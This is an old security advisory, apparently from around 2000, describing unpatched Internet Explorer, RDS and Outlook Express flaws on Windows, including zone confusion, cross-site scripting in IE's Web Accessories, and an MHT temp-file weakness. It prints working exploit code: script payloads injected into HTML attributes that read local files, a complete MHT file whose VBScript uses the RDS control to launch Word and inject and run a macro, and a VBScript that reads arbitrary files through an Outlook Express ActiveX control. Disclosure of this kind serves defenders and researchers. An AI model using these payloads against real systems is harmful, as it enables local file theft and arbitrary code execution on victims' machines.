COMMAND
CSS, RDS, Outlook Express
SYSTEMS AFFECTED
Win32
PROBLEM
Shane Hird found following. All these issues have been disclosed
to MS, however no action has been taken so one would assume they
have decided not to patch the following problems.
Cross site scripting issues have been known for quite while now,
in fact a long time before the recent CERT advisory about the
matter, MS have had in place security measures for this ever
since they started displaying custom local 404 error messages and
others. Taken directly from
res://C:\WINDOWS\SYSTEM32\SHDOCLC.DLL/HTTP_404.HTM:
// Security precaution: must filter out "urlResult" and "displayresult"
forbiddenChars = new RegExp("[<>\'\"]", "g"); // Global search/replace
urlresult = urlresult.replace(forbiddenChars, "");
displayresult = displayresult.replace(forbiddenChars, "");
Obviously, because the page will be displaying remotely defined
strings in the local zone, MS have filtered out 'dangerous'
characters, which is fair enough. Without this security
precaution, this page and others could easily be exploited. In
fact, there are certain ones which are, which will be shown
later, although they are a minor problem.
MK/RES LFN CSS Bug
==================
There are a few problems with the RES and MK and probably other
protocols in that they dont recognise the temporary internet
files as an internet zone when specified in short 8 char format.
ie, the following will be opened in the 'local' zone whereas they
would normally be opened in the 'Internet' zone if specified
using LFN.
"res://C:\Windows\Tempor~1\Content.IE5\XXXXXXX\dllfile.mid/htmlfile.htm"
"mk:@MSITStore:C:\Windows\Tempor~1\Content.IE5\XXXXXXX\chmfile.chm::/htmfile.htm"
This may not be much of an issue due to the fact that 'XXXXXXXX'
is a random string and pretty much impossible to guess. However,
outlook places TEMP files in the TEMP directory (not the
temporary internet files directory) and places temp HTM files in
the root of the Temporary Internet Files directory so it is easy
to guess the location. And HTM files can be extracted and opened
(in the 'local' zone) from the likes of MID files so can be
exploited in a similar fashion to the Active Setup problem,
although it would simply be a CSS exploit (which can be
potentially serious, see later). The are various ways of
exploiting this through outlook using various protocols and file
formats etc, we won't list them here, but basically by not using
a local temp directory and instead a random temp internet files
directory it would solve most of the problems.
Web Accessories CSS Bug
=======================
MS have released extensions to IE that allow viewing an image
list, URL list and document tree among other things. These
extensions are essentially just HTM files which parse the current
HTM file and display results using script, which is shown in the
local zone. Immediately one realises that this can be exploited
if we can define the strings which are displayed, which we can.
Each of the below lines will display a text file when one of the
extensions is used on the current HTM file. This is a typical
CSS bug, which can be exploited further with the use of RDS, see
later.
Document Tree Exploit:
<OBJECT ID="<SCRIPT>a=window.open('file://c:/test.txt');alert('wait');alert(a.document.body.innerText);</SCRIPT>" CLASSID="CLSID:0"></OBJECT>
URL List Exploit:
<a href="<SCRIPT>a=window.open('file://c:/test.txt');alert('wait');alert(a.document.body.innerText);</SCRIPT>"></a>
Image List Exploit:
<IMG src="<SCRIPT>a=window.open('file://c:/test.txt');alert('wait');alert(a.document.body.innerText);</SCRIPT>">
MHT Temp File CSS Bug
=====================
A typical Temp file vulnerability. IE5 (or one of them) introduced
the new 'Web Archive' format for storing web pages, which have the
extension MHT. IE5 essentially takes each file which is needed
for display of the page and encodes sequentially to a single MHT
file in the format of a MIME message, 7bit and Base64 encoding
and all, it even has a 'From:' field. (this by the way makes it
difficult to send and recieve MHT attachments because outlook, or
perhaps the mail server, converts it into MSG format, completely
destroying the original file).
When parsing the MHT file, IE extracts each file and places it
into a single locked TMP file, however if the file referenced is
in a frame or an IFRAME, the file is extracted and placed into
its own unlocked file in the local temp directory, with guessable
names, in fact, even definable names. An example exploit is
included with the note about RDS.
RDS ActiveX Control Bug
=======================
A new ActiveX control included with Visual Studio and probably
IIS and other databasey type applications. Anyway, when invoked in
the local zone one can avoid the 'ActiveX' warning by creating
business objects via DCOM using IP 127.0.0.1 instead of
'in-process' and from there take on pratically any action with
permissions dependent on the current DCOM settings and current
user. This works on default configurations of any Win machine
with RDS installed.
This example fires up MS word and runs a custom macro, which from
there you can take on any action at all. The example is included
as part of the MHT exploit, which will extract a file to the temp
directory and open it. Hopefully this won't get stuffed up by
any 'smart' mail server.
<------------------------ snip MHTExp.MHT --------------------->
From: <Saved by Microsoft Internet Explorer 5>
Subject: MHT Exploit
Date: Thu, 17 Feb 2000 19:31:45 +1000
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_NextPart_000_0000_01BF797D.A014BDD0"
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600
This is a multi-part message in MIME format.
------=_NextPart_000_0000_01BF797D.A014BDD0
Content-Type: text/html;
charset="Windows-1252"
Content-Transfer-Encoding: 7bit
Content-Location: MHTEXploit
<html>
<head>
<title>MHT Exploit</title>
</head>
<frameset cols="*">
<frame name="local" src="file:Exploit.htm">
</frameset>
</html>
------=_NextPart_000_0000_01BF797D.A014BDD0
Content-Type: text/html;
charset="Windows-1252"
Content-Transfer-Encoding: 7bit
Content-Location: file:Exploit.htm
<HTML>
<script language="VBScript"><!--
if location.protocol <> "file:" then
document.writeln("Exploiting MHT temp file vuln - Shane Hird")
'Note - Replace with required temp directory.
window.open("file://C:\Documents and Settings\Shane\Local
Settings\Temp\Exploit.htm")
else
msgbox("Running in local context")
set rds = CreateObject("RDS.DataSpace")
set busobj = rds.CreateObject("Word.Application", "127.0.0.1")
busobj.visible = TRUE
Set NT = busobj.Templates(1).VBProject.VBComponents(1).CodeModule
NT.DeleteLines 1, NT.CountOfLines
NT.InsertLines 1, "Public Sub Example()"
NT.InsertLines 2, " MsgBox (" + Chr(34) + "Example Code..." + Chr(34) + ")"
NT.InsertLines 3, "End Sub"
busobj.run "Normal.ThisDocument.Example"
NT.DeleteLines 1, NT.CountOfLines
set NT = Nothing
busobj.quit
window.close
end if
--></script>
------=_NextPart_000_0000_01BF797D.A014BDD0--
<---------------- snip MHTExp.mht ------------------->
Outlook Express ActiveX Exploit
===============================
There is also this old exploit which apparently got fixed in IE5,
but was never announced. It will allow reading of any file on the
users machine, after the first newline of the file using an
ActiveX provided by Outlook Express.
<object id="MIME" classid="clsid:1C82EAD9-508E-11D1-8DCF-00C04FB951F9" width="500" height="150"></object>
<script language="Vbscript"><!--
msgbox("Please wait while control is loaded..." + Chr(10) + "Outlook Express
MIME Editor Exploit" + Chr(10) + "Written by: Shane Hird")
MIME.src="C:\test.txt"
msgbox("File Loaded")
document.write("<P>File is displayed below</P><HR><PRE>")
document.write(MIME.messagesource)
--></script>
SOLUTION
Nothing yet.